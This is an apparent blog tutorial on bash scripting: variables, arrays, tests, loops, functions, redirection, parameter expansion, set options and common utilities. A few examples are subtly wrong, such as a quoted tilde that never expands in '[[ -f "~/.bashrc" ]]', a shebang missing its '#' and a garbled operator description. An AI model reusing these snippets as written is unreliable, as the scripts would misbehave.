Bash for Hackers, Developers and Skiddies

Shell?

At its base, a shell is simply a macro processor that executes commands. The term macro processor means functionality where text and symbols are expanded to create larger expressions.

A Unix shell is both a command interpreter and a programming language. As a command interpreter, the shell provides the user interface to the rich set of GNU utilities. The programming language features allow these utilities to be combined. Files containing commands can be created, and become commands themselves. These new commands have the same status as system commands in directories such as /bin, allowing users or groups to establish custom environments to automate their common tasks.

Shells may be used interactively or non-interactively. In interactive mode, they accept input typed from the keyboard. When executing non-interactively, shells execute commands read from a file.

A shell allows execution of GNU commands, both synchronously and asynchronously. The shell waits for synchronous commands to complete before accepting more input; asynchronous commands continue to execute in parallel with the shell while it reads and executes additional commands. The redirection constructs permit fine-grained control of the input and output of those commands. Moreover, the shell allows control over the contents of commands’ environments.

Shells also provide a small set of built-in commands (builtins) implementing functionality impossible or inconvenient to obtain via separate utilities. For example, cd, break, continue, and exec cannot be implemented outside of the shell because they directly manipulate the shell itself. The history, getopts, kill, or pwd builtins, among others, could be implemented in separate utilities, but they are more convenient to use as builtin commands. All of the shell builtins are described in subsequent sections.

While executing commands is essential, most of the power (and complexity) of shells is due to their embedded programming languages. Like any high-level language, the shell provides variables, flow control constructs, quoting, and functions.

Shells offer features geared specifically for interactive use rather than to augment the programming language. These interactive features include job control, command line editing, command history and aliases. Each of these features is described in this manual.

!!$

Shebang

You will always see #!/bin/bash or #!/usr/bin/env bash as the first line when writing or reading bash scripts. Shebang starts with #! characters and the path to the bash or other interpreter of your choice. Let us see what is Shebang in Linux and Unix bash shell scripts.

The #! syntax is used in scripts to indicate an interpreter for execution under UNIX / Linux operating systems. The directive must be the first line in the Linux shell script and must start with shebang #!. You can add argument after the shebang characters, which is optional. Make sure the interpreter is the full path to a binary file. For example: /bin/bash.

The syntax is:

#!/path/to/interpreter [arguments]
#!/path/to/interpreter -arg1 -arg2

Most Linux shell and perl / python script starts with the following line. Bash or sh example:

#!/bin/bash

Starting a Script With #!

  • It is called a shebang or a “bang” line.
  • It is nothing but the absolute path to the Bash interpreter.
  • It consists of a number sign and an exclamation point character (#!), followed by the full path to the interpreter such as /bin/bash.
  • All scripts under Linux execute using the interpreter specified on a first line.
  • Almost all bash scripts often begin with #!/bin/bash (assuming that Bash has been installed in /bin)
  • This ensures that Bash will be used to interpret the script, even if it is executed under another shell.
  • The shebang was introduced by Dennis Ritchie between Version 7 Unix and 8 at Bell Laboratories. It was then also added to the BSD line at Berkeley.

Now let’s go back to elementary, Define variables variables in Bash are defined with a equal sign, There is no space before and after the equal sign. The reason is simple – Bash cannot distinguish a variable assignment from a program with arguments if there are spaces around the equal sign:

var='value'

Does it mean assigning ‘foo’ to a variable named op, or executing the program /bin/op with two arguments, namely, ‘=’ and ‘foo’? Just put a dollar sign before the variable,

name=foo
echo "Hello, $name"

We can also use braces to surround the variable. It’s equivalent to the form without braces with an exception:

echo "Hello, ${name}"

# Without braces, the variable becomes $namefoo
echo "Hello, ${name}foo"

We can assign a variable to another:

name=foo
greeting="Hello, ${name}"

Alright, Let’s talk arrays, Arrays are defined as a list of words between ( and ) We can also implicitly define an array by assigning values to its indices.

array[0]=foo
array[3]=bar
# Creates an array of two elements.

Curly braces are required to access an element in an array, e.g. ${array[0]}.

array=(1 3 10)
array[0]=foo
echo "${array[0]} ${array[1]}"
# Prints:
# foo 3

If the index to be accessed does not exist, Bash will return an empty string instead. The length of an array can be obtained through ${#array[@]}.

array=(3 10 2 6)
echo "${#array[@]}"

There are cases when we want to access the array as a whole, e.g.,

  1. Accessing each element in a loop;
  2. Passing the array as an argument or a list of arguments to a program.

Bash provides two slightly different forms to refer to the whole array: ${array[@]} and ${array[*]}. Either of them can be used with or without double quotes. So there are in total four different forms to access the whole array. Their effects are different.

${array[@]} and ${array[*]} behave in the same way, first interpolating the value of the array into where it is used and then do word-splitting. If an element contains spaces, it will be split into multiple arguments.

"${array[@]}" treats each element of the array as a separate argument. In contrary to the previous case, the argument containing spaces will still be regarded as one argument.

"${array[*]}" converts the whole array into a string. It’s like doing the join operation on the array that many scripting languages support.

# An array
array=('foo bar' baz)

# Creates "foo", "bar" and "baz"
touch ${array[@]}
touch ${array[*]}

# Creates "foo bar" and "baz"
touch "${array[@]}"

# Creates "foo bar baz"
touch "${array[*]}"

We already know Bash variables are untyped. It means arrays can be used like strings, and strings can also be used like arrays, but the result may not be what we desired.

If we have an array variable myarray, using it as a string such as $myarray returns the first element of the array, equivalent to ${myarray[0]}. It is almost always a fault to use arrays in this way.

If we have a string variable mystr, using it as an array has the effect of operating on an array containing only one argument, the string itself. Thus, ${mystr[0]} returns the string itself and ${#mystr[@]} returns 1.

Truth values of exit codes

All processes terminate with an exit code. In Bash, the exit code of the last command is written to the special variable $?.

But very counter-intuitively, when dealing with exit codes, Bash treats 0 as true and all non-zero values as false. This makes sense in this particular scenario, since we can use different non-zero values to represent different failure reasons. But we must keep in mind that it’s contrary to how it deal with integers as booleans in arithmetic operations, i.e. between (( and )).

&&, || and !

In a programming language that supports primitive boolean values, && is usually the logical-AND operator and || logical-OR. But Bash is slightly different from it, since it doesn’t have built-in boolean values. Instead of returning either 0 or 1, it returns one of the exit codes of the two commands.

CMD1 && CMD2 first executes CMD1. If the exit code of CMD1 is non-zero (i.e. false), then it returns that value immediately without executing CMD2. Otherwise, it executes CMD2 and returns its exit code.

e.g. Execute apt update if apt is installed (command -v PROG is used to test if PROG can be found in regard to PATH).

command -v apt > /dev/null && apt update

CMD1 || CMD2 first executes CMD1. If the exit code of CMD1 is zero (i.e. true), then it returns 0 immediately without executing CMD2. Otherwise, it executes CMD2 and returns its exit code.

e.g. Create ~/.cache if the directory does not exist (the [[ command will be explained later):

[[ -d "~/.cache" ]] || mkdir ~/.cache

In practice, we usually use CMD1 && CMD2 to represent executing CMD2 only if CMD1 succeeds, and CMD1 || CMD2 executing CMD2 only if CMD1 fails.

!CMD is used to flip the zero exit code to 1 and all non-zero exit codes to 0.

The if statement

The form of if statements is:

if TEST ; then
  COMMANDS
elif TEST ; then
  COMMANDS
else
  COMMANDS
fi

The elif and else clauses are optional.

We can use any commands in the place of TEST. But we need to remember that Bash treats zero exit code as true and all non-zero exit codes as false.

We are also allowed to use arithmetic expressions here, such as (( val > 3 )), but we need to keep in mind that if the value of the parethesized expression is non-zero, the exit code of the command will be 0 (both representing true in their own contexts), and vice versa.

The [[ command

A very useful command that can be used as a test condition is [[, the extended test command.

Here are some judgements that [[ supports:

# string equal
[[ "$str1" = "$str2" ]]

# string not equal
[[ "$str1" != "$str2" ]]

# string less-than alphabetically
[[ "$str1" < "$str2" ]]

# string greater-than alphabetically
[[ "$str1" > "$str2" ]]

# integer equal
[[ "$num1" -eq "$num2" ]]

# integer not equal
[[ "$num1" -ne "$num2" ]]

# integer less-than
[[ "$num1" -lt "$num2" ]]

# integer less-than-or-equal-to
[[ "$num1" -le "$num2" ]]

# integer greater-than
[[ "$num1" -gt "$num2" ]]

# integer greater-than-or-equal-to
[[ "$num1" -ge "$num2" ]]

# string is empty
[[ -z "$str" ]]

# string not empty
[[ -n "$str" ]]

# regular file exists
[[ -f "$filepath" ]]

# directory exists
[[ -d "$dirpath" ]]

# file exists and readable
[[ -r "$filepath" ]]

# file exists and writable
[[ -w "$filepath" ]]

# file exists and executable
[[ -x "$filepath" ]]

# compound tests
[[ "$str1" > "$str2" && -z "$filepath" ]]
[[ "$str1" > "$str2" || -z "$filepath" ]]
[[ ! "$str1" > "$str2" ]]
[[ ("$str1" > "$str2" || -z "$filepath") && (-d "$dirpath") ]]

The complete supported tests can be found here.

Strangely, [[ only supports string less-than and greater-than, but not no-less-than or no-greater-than.

Here is an example that first test if ~/.bashrc exists, and if so, execute the commands in the file:

if [[ -f "~/.bashrc" ]] ; then
  source ~/.bashrc
fi

# A more concise form as a one-line command
[[ -f "~/.bashrc" ]] && source ~/.bashrc

The case statement

The syntax of case is:

case "$value" in
  PATTERN)
    COMMANDS
    ;;
  PATTERN1 | PATTERN2)  # Matches either pattern
    COMMANDS
    ;;
esac

A pattern is a string that contains some special characters, for example:

  • * matches any string.
  • ? matches any single character.
  • [...] matches any single character between the brackets.

e.g. Match any string that starts with –mypath= with --mypath=*.

A full description can be found here.

Loops

The for loop takes a list of arguments and executes the loop body by assigning each of the arguments to the loop variable. The interpretation of the arguments follows the general rule of parsing command arguments, first interpolating variables and then splitting words.

The syntax of the for loop is:

for var in ARG1 ARG2 .. ; do
  COMMANDS
done

For example, if we want to iterate a list of words:

words='apple banana strawberry'
for fruit in $words ; do
  echo $fruit
done

We can also iterate a range of integers using the range construct:

# Prints 0 1 .. 9
for i in {0..9} ; do
  echo $i
done

The range construct doesn’t support using variables in it; it means something such as {0..${end}} doesn’t work. We can use the C-like for loop to do this job:

end=10
# Prints 0 1 .. 9
for ((i = 0; i < end; i++)) ; do
  echo $i
done

The dollar sign is optional for variables occurring between (( and )).

The while loop takes a testing command, executing the loop body as long as the test command exits with zero.

while TEST ; do
done

We can also use arithmetic expressions as test commands, but we need to notice what it means for the expression to exit with zero.

i=0
while ((i < 10)) ; do
  echo $i
  ((i = i + 1))
done

Command line arguments

The first argument passed to a bash script is in the variable $1, the second in $2, and so on.

The entire list of arguments can be accessed via $@ and $*. To recap what we have learned in the section of arrays:

  1. $@ and $* respects the general rule of argument parsing, first string interpolation and then word-splitting.
  2. "$@" treats each element as an individual arguments, equivalent to "$1" "$2" ..
  3. "$*" treats the whole array as an argument, equivalent to "$1 $2 .."

We can use $# to get the length of the argument list.

The shift [N] command is useful in parsing command line arguments. It removes the first N arguments from the list and moves all other arguments ahead. In the example below, we use a while loop to iterate the arguments and use a case statement to do pattern matching on each argument.

USAGE='foo --help --verbose --file [file]'

while (("$#")) ; do
  case $1 in
    --help|-h)
      echo "$USAGE"
      exit 1
      ;;
    --verbose|-v)
      verbose=1
      shift   # N is 1 when omitted
      ;;
    --file|-f)
      file=$2
      shift 2
      ;;
    *)
      echo "Unrecognized option: $1"
      exit 1
      ;;
  esac
done

The built-in command to read from the user is read.

read varname

Read a line from standard input and store it in variable varname. The newline character is not saved in varname.

read -p "Enter your name: " username

Display the prompt and then read a line from standard input.

read -s password

Read a line without echoing. It can be used to read passwords from the user.

read name gender

If the input is Thomas Male, then after reading the input, name will be Thomas and gender will be Male.

The rule is that the input string is split into words with IFS (which is whitespaces and tabs by default), assigning each word to each variable in order, and assigning the rest to the last variable.

Backslashes can be used to escape IFS characters, e.g., foo\ bar is considered as a word.

read -a arrayname

Read a line and store it as an array. If the input is foo bar, then the array will contains two elements, one is foo and the other bar.

while read line ; do
  echo "$line"
done

Read line by line from standard input until reaching end of file or the user presses Ctrl-D.

cat orders.txt | while read customer product ; do
  echo "$customer purchased $product"
done

Process orders.txt line by line. standard input can be redirected to the output of another command.

Functions

#!/bin/bash

function quit {
   exit
}
function hello {
   echo Hello!
}
hello
quit
echo foo

Functions with parameters sample

#!/bin/bash

function quit {
   exit
}
function e {
    echo $1
}
e Hello
e World
quit
echo foo

Functions are like embedded scripts in Bash scripts, but not exactly, since functions are run in the same process (compared to subprocesses, which are run in a separate process).

The example below defines a function called compress that runs the tar command to compress files and directories.

compress () {
  local target=$1
  local source=$2
  tar -cjvf "${target}.tar.bz2" "${source}"
}

Local variables in a function should be declared with the local keyword. If the variable is not declared with local, it will be treated as a global variable. Assigning to a variable not declared with local might overwrite the value of a global variable with the same name.

The function body can access function arguments in the same way that the script access command-line arguments, e.g., via $1, $2 and $@.

A function is also invoked in the same manner as a command. For example, to compress directory foo into foobar.tar.bz2:

compress foobar foo

standard input and output of a function can be redirected as well. The following example redirects the output of the function to a file.

get_password () {
  local result
  read -s -p "Password: " result
  echo "$result"
}

get_password > password.txt

Functions can have return values. The return value can be used in the if statement, for example:

trivial () {
  return 0
}

if trivial ; then
  echo "It's trivially true"
fi

Subprocesses

Instead of running commands in the current process, we can run some commands in a separate subprocess. The way we run commands in a separate process is to surround the commands between ( and ), for example:

# The cd command doesn't change the working directory of the parent process.
(cd foo ; make)

There are several reason why we want to run commands in a subprocess:

  1. What happens in the subprocess won’t affect the parent process. In the example above, the change of the working directory only has an influence on the command in the subprocess itself, i.e., the make command.
  2. If the subprocess exits prematurely, it won’t terminate the parent process.
  3. We can capture the output of the subprocess into a variable. See the example below that captures the output of ls -al and saves it into variable res:
res=$(ls -al)

Environment Variables

All Bash variables are not environment variables.

If we only define a Bash variable MY_ENV=3 without exporting it, it won’t be passed down to subprocesses.

To make a Bash variable an environment variable, we need to export it at least once.

Although it’s common to assign an environment variable while exporting it, doing so is not necessary.

# Approach 1
export MY_ENV=3

# Equivalent Approach 2
MY_ENV=3
export MY_ENV

If we want to specify an environment variable for only one command, we can embed the assignment of the environment variable in that command. For example:

NODE_ENV=test node app.js

Redirections

There are three standard files opened at the start of every command: standard input, standard output and standard error, corresponding to file descriptor 0, 1, and 2.

By default, standard input is the keyboard, and standard output/error is the screen. But we can redirect them to disk files, named pipes, and even other processes via pipes.

Redirect standard input

mycmd < input.txt

Redirect standard input to input.txt.

Redirect standard output

mycmd > output.log

Redirect standard output to output.log. If the file exists, clear the content of the file first.

Appending to a file

mycmd >> output.log

Redirect standard output to output.log, appending to the file.

Redirect standard error

mycmd 2> error.log

Redirect standard error to error.log.

Redirect standard error to standard output

mycmd 2>&1

Redirect standard error to standard output.

Shell-Parameter-Expansion

The ‘$’ character introduces parameter expansion, command substitution, or arithmetic expansion. The parameter name or symbol to be expanded may be enclosed in braces, which are optional but serve to protect the variable to be expanded from characters immediately following it which could be interpreted as part of the name.

The length in characters of the expanded value of parameter is substituted. If parameter is * or @, the value substituted is the number of positional parameters. If parameter is an array name subscripted by * or @, the value substituted is the number of elements in the array. If parameter is an indexed array name subscripted by a negative number, that number is interpreted as relative to one greater than the maximum index of parameter, so negative indices count back from the end of the array, and an index of -1 references the last element.

var="I'm foo"
echo ${#var}   

If the first character of parameter is an exclamation point (!), and parameter is not a nameref, it introduces a level of indirection. Bash uses the value formed by expanding the rest of parameter as the new parameter; this is then expanded and that value is used in the rest of the expansion, rather than the expansion of the original parameter. This is known as indirect expansion. The value is subject to tilde expansion, parameter expansion, command substitution, and arithmetic expansion. If parameter is a nameref, this expands to the name of the variable referenced by parameter instead of performing the complete indirect expansion. The exceptions to this are the expansions of ${!prefix*} and ${!name[@]} described below. The exclamation point must immediately follow the left brace in order to introduce indirection.

In each of the cases below, word is subject to tilde expansion, parameter expansion, command substitution, and arithmetic expansion.

When not performing substring expansion, using the form described below (e.g., ‘:-’), Bash tests for a parameter that is unset or null. Omitting the colon results in a test only for a parameter that is unset. Put another way, if the colon is included, the operator tests for both parameter’s existence and that its value is not null; if the colon is omitted, the operator tests only for existence.

Alright, but What is the difference between ${var}, “$var”, and “${var}” in the Bash shell?

${var:-default}  # Use default if var is unset or empty
${var:=default}  # Set var to default if var is unset or empty
${var:+value}    # Use value if var is set, otherwise use nothing
${var#pattern}   # Remove shortest match of pattern from the beginning
${var##pattern}  # Remove longest match of pattern from the beginning
${var%pattern}   # Remove shortest match of pattern from the end
${var%%pattern}  # Remove longest match of pattern from the end

In most cases, $var and ${var} are the same:

var="Hello"
echo $var

The braces are only needed to resolve ambiguity in expressions:

var="Hello World"
echo "${var}"

When you add double quotes around a variable, you tell the shell to treat it as a single word, even if it contains whitespaces, As with $var vs. ${var}, the braces are only needed for example:

var="foo bar"
for i in "$varbar"; do # Expands to 'for i in ""; do...' since there is no
    echo $i            #   variable named 'varbar', so loop runs once and
done                   #   prints nothing (actually "")

var="foo bar"
for i in "${var}bar"; do # Expands to 'for i in "foo barbar"; do...'
    echo $i              #   so runs the loop once
done
# foo barbar

Note that "${var}bar" in the second example above could also be written "${var}"bar, in which case you don’t need the braces anymore, i.e. "$var"bar. However, if you have a lot of quotes in your string these alternative forms can get hard to read (and therefore hard to maintain),

Referencing an array variable without a subscript is equivalent to referencing the array with a subscript of 0.

mean’s if you don’t supply an index with [], you get the first element of the array:

foo=(a b c)
echo $foo
# a

Which is exactly the same as

foo=(a b c)
echo ${foo}
# a

To get all the elements of an array, you need to use @ as the index, e.g. ${foo[@]}. The braces are required with arrays because without them, the shell would expand the $foo part first, giving the first element of the array followed by a literal [@]:

foo=(a b c)
echo ${foo[@]}
# a b c
echo $foo[@]
# a[@]

You didn’t ask about this but it’s a subtle difference that’s good to know about. If the elements in your array could contain whitespace, you need to use double quotes so that each element is treated as a separate “word:”

foo=("the first" "the second")
for i in "${foo[@]}"; do # Expands to 'for i in "the first" "the second"; do...'
    echo $i              #   so the loop runs twice
done
# the first
# the second

Contrast this with the behavior without double quotes:

foo=("the first" "the second")
for i in ${foo[@]}; do # Expands to 'for i in the first the second; do...'
    echo $i            #   so the loop runs four times!
done
# the
# first
# the
# second

Alright, let’s take a look at some examples, How to check if a string contains a substring, I stackoverflow this but there’s a answer, you can :

string='My long string'
if [[ $string == *"My long"* ]]; then
  echo "It's there!"
fi

Note that spaces in the needle string need to be placed between double quotes, and the * wildcards should be outside. Also note that a simple comparison operator is used (i.e. ==), not the regex operator =~.

If you prefer the regex approach:

string='My string';

if [[ $string =~ "My" ]]; then
   echo "It's there!"
fi

I am not sure about using an if statement, but you can get a similar effect with a case statement:

case "$string" in
  *foo*)
    # Do stuff
    ;;
esac

How to portability use “${@:2}”?

Neither ${@:2} nor ${*:2} is portable, and many shells will reject both as invalid syntax. If you want to process all arguments except the first, you should get rid of the first with a shift.

At this point, the first argument is in “$first” and the positional parameters are shifted down one.

#!/bin/bash

if [[ $# -eq 1 ]]; then
        echo "$1"
else
        echo "$1 $(printf '%q' "${@:2}")"
fi

echo "another way..."

first="${1}"
shift
echo The arguments after the first are:
for x; do echo "$x"; done

Shell Parameter Expansion (Default value)

if [ -z "${VARIABLE}" ]; then
    FOO='default'
else
    FOO=${VARIABLE}
fi

To get the assigned value, or default if it’s missing:

FOO="${VARIABLE:-default}"  # If variable not set or null, use default.
# If VARIABLE was unset or null, it still is after this (no assignment done).

Or to assign default to VARIABLE at the same time:

FOO="${VARIABLE:=default}"  # If variable not set or null, set it to default.

Compare #!/bin/bash --login with #!/bin/bash

The main difference is that a login shell executes your profile when it starts. From the man page:

When bash is invoked as an interactive login shell, or as a non-interactive shell with the –login option, it first reads and executes commands from the file /etc/profile, if that file exists. After reading that file, it looks for ~/.bash_profile, ~/.bash_login, and ~/.profile, in that order, and reads and executes commands from the first one that exists and is readable. The –noprofile option may be used when the shell is started to inhibit this behavior.

When a login shell exits, bash reads and executes commands from the file ~/.bash_logout, if it exists.

Concatenate Strings

The simplest way to concatenate two or more string variables is to write them one after another:

VAR1="Hello,"
VAR2=" World"
VAR3="$VAR1$VAR2"
echo "$VAR3"

You can also concatenate one or more variable with literal strings. In the example above variable VAR1 is enclosed in curly braces to protect the variable name from surrounding characters. When the variable is followed by another valid variable-name character you must enclose it in curly braces ${VAR1}.

VAR1="Hello, "
VAR2="${VAR1}World"
echo "$VAR2"

Another way of concatenating strings in bash is by appending variables or literal strings to a variable using the += operator:

VAR1="Hello, "
VAR1+=" World"
echo "$VAR1"

The following example is using the += operator to concatenate strings in bash for loop :

VAR=""
for ELEMENT in 'Hydrogen' 'Helium' 'Lithium' 'Beryllium'; do
  VAR+="${ELEMENT} "
done

echo "$VAR"

Compare

Compare Strings

  • string1 = string2 and string1 == string2 - The equality operator returns true if the operands are equal.
    • Use the = operator with the test [ command.
    • Use the == operator with the [[ command for pattern matching.
  • string1 != string2 - The inequality operator returns true if the operands are not equal.
  • string1 =~ regex - The regex operator returns true if the left operand matches the extended regular expression on the right.
  • string1 > string2 - The greater than operator returns true if the left operand is greater than the right sorted by lexicographical (alphabetical) order.
  • string1 < string2 - The less than operator returns true if the right operand is greater than the right sorted by lexicographical (alphabetical) order.
  • -z string - True if the string length is zero.
  • -n string - True if the string length is non-zero.
-e <file_a>: File_a exists.
-f <file_a>: File_a exists and a regular file.
-d <file_a>: File_a exists and is a directory.
-r <file_a>: File_a exists with read permissions.
-w <file_a>: File_a exists with write permissions.
-x <file_a>: File_a exists with execute permissions.
-s <file_a>: File_a exists and file size is greater than zero.
-O <file_a>: File_a exists and the owner is effective user ID.
-G <file_a>: File_a exists and the owner is effective group ID.
-h <file_a>: File_a exists and it’s a symbolic link.
-L <file_a>: File_a exists and it’s a symbolic link.
-b <file_a>: File_a exists. It’s a block-special file.
-c <file_a>: File_a exists. It’s a character-special file.
-S <file_a>: File_a exists. It’s a socket.

For Example :

#!/bin/bash

# Check if the first argument is "hello"
if [[ $1 == "hello" ]]; then
    echo "First argument is 'hello'"
fi

# Check if the variable "name" is not empty
if [[ -n $name ]]; then
    echo "Variable 'name' is not empty"
fi

# Check if the second argument is empty
if [[ -z "$2" ]]; then
    echo "Second argument is empty"
fi

# OR check if the variable "file" is either "file1.txt" or "file2.txt"
if [ "$file" = "file1.txt" ] || [ "$file" = "file2.txt" ]; then
    echo "Variable 'file' is either 'file1.txt' or 'file2.txt'"
fi

# Compact string comparison
[[ "$input" == "yes" ]] && echo "Input is 'yes'" || echo "Input is not 'yes'"

How about to if a String Contains a Substring, There are multiple ways to check if a string contains a substring. One approach is to use surround the substring with asterisk symbols * which means match all characters.

!/bin/bash

VAR='GNU/Linux is an operating system'
if [[ $VAR == *"Linux"* ]]; then
  echo "It's there."
fi

Another option is to use the regex operator =~ as shown below. The period followed by an asterisk .* matches zero or more occurrences any character except a newline character.

#!/bin/bash

VAR='GNU/Linux is an operating system'
if [[ $VAR =~ .*Linux.* ]]; then
  echo "It's there."
fi

Comparing Strings with the Case Operator, Instead of using the test operators you can also use the case statement to compare strings:

#!/bin/bash

VAR="Arch Linux"

case $VAR in

  "Arch Linux")
    echo -n "Linuxize matched"
    ;;

  Fedora | CentOS)
    echo -n "Red Hat"
    ;;
esac

Lexicographical comparison is an operation where two strings are compared alphabetically by comparing the characters in a string sequentially from left to right. This kind of comparison is rarely used. The following scripts compare two strings lexicographically:

#!/bin/bash

VAR1="Linuxize"
VAR2="Ubuntu"

if [[ "$VAR1" > "$VAR2" ]]; then
    echo "${VAR1} is lexicographically greater then ${VAR2}."
elif [[ "$VAR1" < "$VAR2" ]]; then
    echo "${VAR2} is lexicographically greater than ${VAR1}."
else
    echo "Strings are equal"
fi

Compare Digital

if [[ $# -eq 0 ]]; then
  # digital compare
  # -eq / -lt / -le / -gt / -ge / -ne
fi

./run.sh
if [[ $? -ne 0 ]];then
  echo "run.sh failed"
  exit 1
fi

Colors

Will cover this later in offensive section!! with examples

#!/bin/bash

# Function to print colored text
PrintColor() {
    echo -e "\e[1;31m$@\e[0m"
}

# Define common variables
ColorRedBeg="\e[1;31m"
ColorGreenBeg="\e[1;32m"
ColorYellowBeg="\e[1;33m"
ColorBlueBeg="\e[1;34m"
ColorMagentaBeg="\e[1;35m"
ColorCyanBeg="\e[1;36m"
ColorWhiteBeg="\e[1;37m"
ColorEnd="\e[m"

# Function to display usage information
Usage() {
    printf "$ColorBlueBeg%-16s\n$ColorEnd" "Usage: $0 [option] [value]"
    printf "%-16s\n" "Options:"
    printf "$ColorGreenBeg%-32s %-64s\n$ColorEnd" "-h" "Display help"
}

# Function to print styled text
print_style() {
    case "$2" in
        "info") COLOR="96m" ;;
        "success") COLOR="92m" ;;
        "warning") COLOR="93m" ;;
        "danger") COLOR="91m" ;;
        *) COLOR="0m" ;; # default color
    esac

    STARTCOLOR="\e[$COLOR"
    ENDCOLOR="\e[0m"

    printf "$STARTCOLOR%b$ENDCOLOR" "$1"
}

# Example usage of print_style function
print_style "This is a green text " "success"
print_style "This is a yellow text " "warning"
print_style "This is a light blue with a \t tab " "info"
print_style "This is a red text with a \n new line " "danger"
print_style "This has no color"

Others

num=4; if (test $num -gt 5); then echo "yes"; else echo "no"; fi

file="/etc/passwd"; if [ -e $file ]; then echo "whew"; else echo "uh-oh"; fi

if [[ -f "proc.pid" ]]; then
  pid=`cat proc.pid`
fi

ForceStopAll

ps aux | grep `pwd` | grep -v grep | awk '{print $2}' | xargs kill -9

CurrentPath

#!/bin/bash

echo $0                            # Script name
echo $(dirname $0)                 # Get the relative path of the current script
echo $(readlink -f $0)             # readlink displays the location pointed to by symbolic links. If $0 is not a symbolic link, it displays the absolute path of the file itself.
echo $(dirname $(readlink -f $0))  # Get the absolute path of the current script

Align

For bash, use the printf command with alignment flags.

echo "Usage: $0 [option] [value]"
printf "%-16s %-64s\n" -h xxxx
Usage: main.sh [option] [value]
-h               xxxx
  • %s %c %d %f are all format specifiers, %s outputs a string, %d outputs an integer, %c outputs a character, and %f outputs a real number in decimal form.
  • %-10s specifies a width of 10 characters (the - indicates left alignment, otherwise it’s right aligned), any characters will be displayed within the 10-character width, if less it will automatically be padded with spaces, and if it exceeds, the content will be fully displayed.
  • %-4.2f formats as a decimal, where .2

Bash Tips

Parameter Substitution

If parameter not set, use default.

${parameter-default}, ${parameter:-default}

GDB=${GDB:-/usr/bin/gdb}
echo $GDB # /usr/bin/gdb

Here document

The cat <<EOF syntax is very useful when working with multi-line text in Bash, eg. when assigning multi-line string to a shell variable, file or a pipe.

  • Assign multi-line string to a shell variable
sql=$(cat <<EOF
SELECT foo, bar FROM db
WHERE foo='baz'
EOF
)
echo $sql
  • Pass multi-line string to a file in Bash
cat <<EOF > print.sh
> #!/bin/bash
> echo \$PWD
> echo $PWD
> EOF

The print.sh file now contains:

#!/bin/bash
echo $PWD
echo /home/user
  • Pass multi-line string to a pipe in Bash
cat <<EOF | grep 'b' | tee b.txt
foo
bar
baz
EOF

The b.txt file contains bar and baz lines. The same output is printed to stdout.

eval

#!/bin/bash

f()
{
    echo "abc"
    exit 1
}

OUTPUT=`eval f`
if [[ $? -ne 0 ]]; then
    printf "error: %s\n" "${OUTPUT}"
else
    printf "ok: %s\n" "${OUTPUT}"
fi
$./eval.sh
error: abc

eval is part of POSIX. It’s an interface which can be a shell built-in.

eval - construct command by concatenating arguments

It will take an argument and construct a command of it, which will then be executed by the shell. This is the example from the manpage:

foo=10 x=foo
y='$'$x
echo $y
$foo
eval y='$'$x
echo $y
10

  1. In the first line you define $foo with the value '10' and $x with the value 'foo'.
  2. Now define $y, which consists of the string '$foo'. The dollar sign must be escaped with '$'.
  3. To check the result, echo $y.
  4. The result will be the string '$foo'
  5. Now we repeat the assignment with eval. It will first evaluate $x to the string 'foo'. Now we have the statement y=$foo which will get evaluated to y=10.
  6. The result of echo $y is now the value '10'.

set

When executing a Bash script, for example, bash script.sh, a new shell is created, and script.sh is executed within this new shell. This shell is the script’s execution environment, and Bash provides various parameters for this environment by default. The set command is used to modify the operating parameters of the shell environment, allowing customization.


# Treat unset variables as an error when expanding them, rather than silently ignoring them.
set -u

# Print commands and their arguments as they are executed.
set -x

# Exit immediately if a pipeline (which may consist of a single simple command), a list, or a compound command returns a non-zero status.
# `set -e` is based on the return value to determine if a command fails.
# `set +e` turns off the `-e` option, and `set -e` turns it back on.
set -e

# There's an exception to `set -e`, which doesn't apply to pipeline commands.
# In Bash, the return value of a pipeline command is determined by the last sub-command.
# This means that as long as the last sub-command does not fail, the pipeline command will always succeed, and thus subsequent commands will still be executed, making `set -e` ineffective.
# `set -o pipefail` is used to address this situation, causing the entire pipeline command to fail if any sub-command fails, resulting in script termination.
set -o pipefail

Common error handling methods as an alternative to set -e:

# The script stops execution if `command` returns a non-zero status.
command || exit 1

# If two commands are interdependent, the second command is executed only if the first command succeeds.
command1 && command2
# Option 1
command || { echo "command failed"; exit 1; }

# Option 2
if ! command; then
    echo "command failed";
    exit 1;
fi

# Option 3
command
if [ "$?" -ne 0 ]; then
    echo "command failed";
    exit 1;
fi

Summary: The set command with the above four parameters are typically used together, These two styles are recommended to be placed at the beginning of all Bash scripts.

Another approach is to pass these parameters from the command line when executing the Bash script: bash -euxo pipefail script.sh

# Style 1
set -euxo pipefail

# Style 2
set -eux
set -o pipefail

cp

# copy file preserving directory path
mkdir test
cp --parents `find . -name "*.gcno"` test

find

find /media/d/ -type f -size +50M ! \( -name "*deb" -o -name "*vmdk" \)

! expression : Negation of a primary; the unary NOT operator.

( expression ): True if expression is true.

expression -o expression: Alternation of primaries; the OR operator. The second expression shall not be evaluated if the first expression is true.

Note that parenthesis, both opening and closing, are prefixed by a backslash () to prevent evaluation by the shell.

#!/bin/bash

CORE_FILES=`find /data/home/foo -type f -size +50M -name "*core*"`
if [[ -n $CORE_FILES ]]; then
  rm $CORE_FILES
else
  echo "no find core files"
fi

awk

The awk utility shall execute programs written in the awk programming language, which is specialized for textual data manipulation. An awk program is a sequence of patterns and corresponding actions. When input is read that matches a pattern, the action associated with that pattern is carried out.

Input shall be interpreted as a sequence of records. By default, a record is a line, less its terminating , but this can be changed by using the RS built-in variable. Each record of input shall be matched in turn against each pattern in the program. For each pattern matched, the associated action shall be executed.

The awk utility shall interpret each input record as a sequence of fields where, by default, a field is a string of non- non- characters. This default and field delimiter can be changed by using the FS built-in variable or the -F sepstring option. The awk utility shall denote the first field in a record $1, the second $2, and so on. The symbol $0 shall refer to the entire record; setting any other field causes the re-evaluation of $0. Assigning to $0 shall reset the values of all other fields and the NF built-in variable.

Summing values of a column using awk command

awk '{s+=$1;}END{print s}'

cut

cut -d "delimiter" -f (field number) file.txt

sed

The sed utility is a stream editor that shall read one or more text files, make editing changes according to a script of editing commands, and write the results to standard output. The script shall be obtained from either the script operand string or a combination of the option-arguments from the -e script and -f script_file options.

$ cat tmp
foo
123
foo
456
$ cat tmp | sed -e "1,2s/foo/bar/"
bar
123
foo
456
$ cat tmp | sed -e "s/foo/bar/"
bar
123
bar
456

wait

wait [n ...]
    Wait for each specified process and return its termination status. Each n may be a process ID or a job specification; if a job spec is given, all processes in that job's pipeline
    are waited for. If n is not given, all currently active child processes are waited for, and the return status is zero. If n specifies a non-existent process or job, the return
